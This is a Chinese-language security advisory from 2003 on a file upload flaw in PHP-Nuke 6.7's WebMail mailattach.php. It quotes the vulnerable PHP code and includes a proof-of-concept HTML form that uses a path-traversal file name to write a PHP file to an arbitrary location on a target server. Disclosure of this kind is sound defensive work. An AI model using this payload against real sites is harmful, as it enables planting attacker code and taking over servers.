PHP-Nuke mailattach.php远程文件上串漏洞发布时间:2003-10-04 更新时间:2003-10-04 严重程度:中 威胁程度:其它 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8764 受影响系统 Francisco Burzi PHP-Nuke 6.7详细描述 PHP-Nuke mailattach.php脚本包含如下代码: modules/WebMail/mailattach.php : ---------------------------------------------------------------------------------- --------------------------------- if (isset($userfile) AND $userfile != "none" AND !ereg("/", $userfile) AND !ereg("\.\.", $userfile) AND !ereg("%", $userfile)) { if (ini_get(file_uploads) AND $attachments == 1) { $updir = "tmp"; @copy($userfile, "$updir/$userfile_name"); @unlink($userfile); } } ---------------------------------------------------------------------------------- --------------------------------- 由于对userfile_name参数缺少过滤,可导致攻击者传递任意文件到服务器上,可覆盖文件或把敏感文件存放在任意系统位置。 测试代码 <form action="http://[target]/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/bad.php" method="POST" ENCTYPE="multipart/form-data"> <input type="hidden" name="attachments" value="1"> <input type="file" name="userfile"><br> <input type="submit" name="Send File> </form> 解决方案 尚无 相关信息 参考:http://www.securityfocus.com/archive/1/340245 相关主页:http://phpnuke.org/ |
